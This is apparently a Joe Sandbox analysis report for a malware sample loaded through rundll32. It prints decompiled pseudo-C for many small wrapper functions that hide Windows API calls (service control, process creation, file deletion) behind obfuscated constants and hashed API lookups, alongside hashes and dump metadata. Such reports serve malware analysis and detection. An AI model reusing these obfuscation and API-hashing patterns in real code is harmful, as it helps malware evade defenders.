                                                                                                                                  				_v12 = _v12 / _t34;
                                                                                                                                  				_v12 = _v12 ^ 0x000ac4f3;
                                                                                                                                  				_v8 = 0xb5c996;
                                                                                                                                  				_v8 = _v8 >> 4;
                                                                                                                                  				_v8 = _v8 * 0x19;
                                                                                                                                  				_v8 = _v8 + 0x3329;
                                                                                                                                  				_v8 = _v8 ^ 0x01161fa0;
                                                                                                                                  				E0031AA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
                                                                                                                                  				_t32 = OpenSCManagerW(0, 0, _t43); // executed
                                                                                                                                  				return _t32;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 003091A8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ManagerOpen
                                                                                                                                  • String ID: WF
                                                                                                                                  • API String ID: 1889721586-2390014890
                                                                                                                                  • Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                                  • Instruction ID: 4d74f762a24e6818c5bb03c54f42f2dcc8cc5aa8a3007e356f1817e848c2a0d4
                                                                                                                                  • Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                                  • Instruction Fuzzy Hash: 49016971901108FBEB09CB95DD4ACEFBFB8EF85714F108099F404A7200D3B15F509AA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 255 3042c4-304345 call 3120b9 call 31aa30 OpenServiceW
                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                  			E003042C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _t24;
                                                                                                                                  				void* _t29;
                                                                                                                                  				void* _t34;
                                                                                                                                  
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(_a20);
                                                                                                                                  				_t34 = __edx;
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E003120B9(_t24);
                                                                                                                                  				_v8 = 0x971c9e;
                                                                                                                                  				_v8 = _v8 >> 3;
                                                                                                                                  				_v8 = _v8 + 0xbdaa;
                                                                                                                                  				_v8 = _v8 | 0x44f2c0c3;
                                                                                                                                  				_v8 = _v8 ^ 0x44fb9439;
                                                                                                                                  				_v12 = 0x762558;
                                                                                                                                  				_v12 = _v12 | 0xdc63e739;
                                                                                                                                  				_v12 = _v12 ^ 0xdc7b8d87;
                                                                                                                                  				E0031AA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
                                                                                                                                  				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
                                                                                                                                  				return _t29;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,00314A8F,?,?,2635DC09), ref: 0030433F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: OpenService
                                                                                                                                  • String ID: X%v
                                                                                                                                  • API String ID: 3098006287-3430654708
                                                                                                                                  • Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                                  • Instruction ID: 56d3eb533c09e04bc8c6452136f01526d4d3941a93ad1469f4c2b59af885bfd2
                                                                                                                                  • Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                                  • Instruction Fuzzy Hash: 450104B681120CFBDF16DFD4D9468DEBF79EF18314F148188F90566221D2729B609B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 260 308f65-309010 call 3120b9 call 31aa30 CreateFileW
                                                                                                                                  C-Code - Quality: 35%
                                                                                                                                  			E00308F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				void* _t32;
                                                                                                                                  				void* _t38;
                                                                                                                                  
                                                                                                                                  				_push(_a40);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(_a32);
                                                                                                                                  				_push(_a28);
                                                                                                                                  				_push(_a24);
                                                                                                                                  				_push(_a20);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E003120B9(_t32);
                                                                                                                                  				_v28 = 0xee6fdc;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v12 = 0x957ab3;
                                                                                                                                  				_v12 = _v12 ^ 0x02d9a910;
                                                                                                                                  				_v12 = _v12 + 0xffff8488;
                                                                                                                                  				_v12 = _v12 ^ 0x02485b8e;
                                                                                                                                  				_v8 = 0xf6b813;
                                                                                                                                  				_v8 = _v8 + 0xffff9c70;
                                                                                                                                  				_v8 = _v8 + 0xffff858c;
                                                                                                                                  				_v8 = _v8 ^ 0x00f72129;
                                                                                                                                  				E0031AA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
                                                                                                                                  				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
                                                                                                                                  				return _t38;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 00309009
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                  • Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                                  • Instruction ID: 736b73b008399f08bf646e5d28eaf617186969f5bbcfd8726e2a2af9b4133256
                                                                                                                                  • Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                                  • Instruction Fuzzy Hash: F1112B72901219FBCF229FE5DD098DFBFB5EF58354F118148F90862121C3328A61EB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 265 307f5d-307ff1 call 3120b9 call 31aa30 CreateProcessW
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0030AD99,?,?,?,181C8C04,0030AD99), ref: 00307FEB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                  • Instruction ID: 151d163903b553ec21ff3c7fe19df96059da40df6ac3aca3f0d2d3b8d9b3f942
                                                                                                                                  • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                  • Instruction Fuzzy Hash: 0211E872402118BBDF669F91DD09CDF7F79FF093A4F145144F91925121D3728AA0EBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 270 304ddd-304e73 call 3120b9 call 31aa30 SHFileOperationW
                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                  			E00304DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				void* _t30;
                                                                                                                                  				int _t38;
                                                                                                                                  				signed int _t40;
                                                                                                                                  				signed int _t44;
                                                                                                                                  				struct _SHFILEOPSTRUCTW* _t45;
                                                                                                                                  
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_t45 = __edx;
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				E003120B9(_t30);
                                                                                                                                  				_v16 = _v16 & 0x00000000;
                                                                                                                                  				_v24 = 0x8324bd;
                                                                                                                                  				_v20 = 0xe59c0f;
                                                                                                                                  				_v12 = 0xfa6a5a;
                                                                                                                                  				_v12 = _v12 | 0x6fcfbea7;
                                                                                                                                  				_t40 = 0x1a;
                                                                                                                                  				_push(0x3771311d);
                                                                                                                                  				_push(_t40);
                                                                                                                                  				_v12 = _v12 * 0x42;
                                                                                                                                  				_v12 = _v12 ^ 0xdff430a4;
                                                                                                                                  				_v8 = 0x460bc4;
                                                                                                                                  				_v8 = _v8 | 0x3946640e;
                                                                                                                                  				_push(0xdf0d4f1a);
                                                                                                                                  				_v8 = _v8 / _t40;
                                                                                                                                  				_v8 = _v8 + 0x2a2;
                                                                                                                                  				_v8 = _v8 ^ 0x023f16a4;
                                                                                                                                  				_t44 = 0x58;
                                                                                                                                  				E0031AA30(_t44);
                                                                                                                                  				_t38 = SHFileOperationW(_t45); // executed
                                                                                                                                  				return _t38;
                                                                                                                                  			}














                                                                                                                                  APIs
                                                                                                                                  • SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 00304E6D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileOperation
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3080627654-0
                                                                                                                                  • Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                                  • Instruction ID: 40417041b761de47ad832eb106bbeefc5b274689b46173ef03a6ce4774631be6
                                                                                                                                  • Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                                  • Instruction Fuzzy Hash: 43016DB5E0120DFBCB14EFA4D9469DEBFB4EF44318F10C088E904AB251D3744B549B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E00305DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                  				unsigned int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _t21;
                                                                                                                                  				intOrPtr* _t25;
                                                                                                                                  				void* _t26;
                                                                                                                                  				void* _t30;
                                                                                                                                  				void* _t31;
                                                                                                                                  				void* _t33;
                                                                                                                                  				intOrPtr _t34;
                                                                                                                                  
                                                                                                                                  				_t31 = __edx;
                                                                                                                                  				_t34 = __ecx;
                                                                                                                                  				E003120B9(_t21);
                                                                                                                                  				_v12 = 0x9fac18;
                                                                                                                                  				_v12 = _v12 ^ 0x90454497;
                                                                                                                                  				_v12 = _v12 ^ 0x90d3245f;
                                                                                                                                  				_v8 = 0x647eb;
                                                                                                                                  				_v8 = _v8 >> 0xd;
                                                                                                                                  				_v8 = _v8 >> 3;
                                                                                                                                  				_v8 = _v8 + 0xffff0b9f;
                                                                                                                                  				_v8 = _v8 ^ 0xfff54d3d;
                                                                                                                                  				_t25 = E0031AA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
                                                                                                                                  				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
                                                                                                                                  				return _t26;
                                                                                                                                  			}













                                                                                                                                  APIs
                                                                                                                                  • SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 00305E58
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileHandleInformation
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3935143524-0
                                                                                                                                  • Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                                  • Instruction ID: eea8cb07bc99495c6e970d52cacbbdbd6f34a9ea244f74bf77ff21df8cecbc74
                                                                                                                                  • Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                                  • Instruction Fuzzy Hash: EE01BC76941208BBDB24DE90CC0AEEEBF74EF55314F108088F50466250D3B05B509BA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 280 301e22-301ea6 call 3120b9 call 31aa30 RtlAllocateHeap
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E00301E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _t27;
                                                                                                                                  				void* _t34;
                                                                                                                                  				signed int _t36;
                                                                                                                                  				long _t42;
                                                                                                                                  
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_t42 = __ecx;
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E003120B9(_t27);
                                                                                                                                  				_v12 = 0x309d17;
                                                                                                                                  				_v12 = _v12 | 0x1b560655;
                                                                                                                                  				_v12 = _v12 ^ 0x1b78328a;
                                                                                                                                  				_v8 = 0xa187d;
                                                                                                                                  				_v8 = _v8 + 0xa972;
                                                                                                                                  				_t36 = 0x67;
                                                                                                                                  				_v8 = _v8 / _t36;
                                                                                                                                  				_v8 = _v8 << 7;
                                                                                                                                  				_v8 = _v8 ^ 0x000b519a;
                                                                                                                                  				E0031AA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
                                                                                                                                  				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
                                                                                                                                  				return _t34;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,003080DB,?,00000000,AF136809), ref: 00301EA0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                                  • Instruction ID: 4d10af35013a1c98ba89798ec36b9fc0d14af4677841a3e5583659925332367d
                                                                                                                                  • Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                                  • Instruction Fuzzy Hash: 69014876901108FBEB05DFD4DC0A8DE7BB5EF49354F208089F9085A211D7B29F60AB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 285 3146bb-31473b call 3120b9 call 31aa30 SHGetFolderPathW
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E003146BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				void* _t21;
                                                                                                                                  				intOrPtr* _t25;
                                                                                                                                  				void* _t26;
                                                                                                                                  
                                                                                                                                  				E003120B9(_t21);
                                                                                                                                  				_v20 = 0x3f5bb0;
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_v12 = 0x996874;
                                                                                                                                  				_v12 = _v12 << 0xf;
                                                                                                                                  				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                                  				_v8 = 0xebf0af;
                                                                                                                                  				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                                  				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                                  				_t25 = E0031AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                                  				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                                  				return _t26;
                                                                                                                                  			}











                                                                                                                                  APIs
                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00314735
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1514166925-0
                                                                                                                                  • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                  • Instruction ID: 191bbc8e77642811be7eda9267c769e688676eb37a0f15484cafca7cbfb60fe1
                                                                                                                                  • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                  • Instruction Fuzzy Hash: 4D01EC75802218BBCF15AFD5DC498DFBFB8EF49394F108145F91866211D2758A60DBD1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                  			E003093ED() {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				intOrPtr _t24;
                                                                                                                                  
                                                                                                                                  				_v28 = 0xda6c64;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v12 = 0x88a564;
                                                                                                                                  				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                                  				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                                  				_v8 = 0xd9241f;
                                                                                                                                  				_v8 = _v8 * 0x5c;
                                                                                                                                  				_v8 = _v8 + 0xccdd;
                                                                                                                                  				_v8 = _v8 + 0x903;
                                                                                                                                  				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                                  				E0031AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                                  				ExitProcess(0);
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 0030945B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                  • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                  • Instruction ID: b3746c020b2faffe43c82afac23164d170eeb67aaa1f4460cc3db4304ce424f0
                                                                                                                                  • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                  • Instruction Fuzzy Hash: D2F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9DA04B7261E7705F459A91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                  			E00318F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                  				unsigned int _v8;
                                                                                                                                  				unsigned int _v12;
                                                                                                                                  				void* _t19;
                                                                                                                                  				int _t24;
                                                                                                                                  
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E003120B9(_t19);
                                                                                                                                  				_v12 = 0xd87912;
                                                                                                                                  				_v12 = _v12 >> 7;
                                                                                                                                  				_v12 = _v12 ^ 0x0006adfb;
                                                                                                                                  				_v8 = 0xf5ad8e;
                                                                                                                                  				_v8 = _v8 + 0xc481;
                                                                                                                                  				_v8 = _v8 >> 4;
                                                                                                                                  				_v8 = _v8 ^ 0x00032ff7;
                                                                                                                                  				E0031AA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
                                                                                                                                  				_t24 = CloseServiceHandle(_a12); // executed
                                                                                                                                  				return _t24;
                                                                                                                                  			}








                                                                                                                                  APIs
                                                                                                                                  • CloseServiceHandle.ADVAPI32(33E0711C), ref: 00319002
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandleService
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1725840886-0
                                                                                                                                  • Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                                  • Instruction ID: 01ef5c5d7867656e1d66647c8bc4b6e90a105d073253b10d34fe555f5ba588de
                                                                                                                                  • Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                                  • Instruction Fuzzy Hash: 19F0F9B591120CFFDF06AFD4C94A89EBBB4EB14308F208198F80566611D6769B64EF51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E00311F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _t19;
                                                                                                                                  				int _t25;
                                                                                                                                  
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E003120B9(_t19);
                                                                                                                                  				_v12 = 0x96b134;
                                                                                                                                  				_v12 = _v12 + 0xdeb4;
                                                                                                                                  				_v12 = _v12 | 0x0c5d8169;
                                                                                                                                  				_v12 = _v12 ^ 0x0cdc4dba;
                                                                                                                                  				_v8 = 0xf8ae2a;
                                                                                                                                  				_v8 = _v8 + 0xcab3;
                                                                                                                                  				_v8 = _v8 * 0x2b;
                                                                                                                                  				_v8 = _v8 ^ 0x29e0cf29;
                                                                                                                                  				E0031AA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
                                                                                                                                  				_t25 = DeleteFileW(_a4); // executed
                                                                                                                                  				return _t25;
                                                                                                                                  			}








                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 00311FF5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DeleteFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4033686569-0
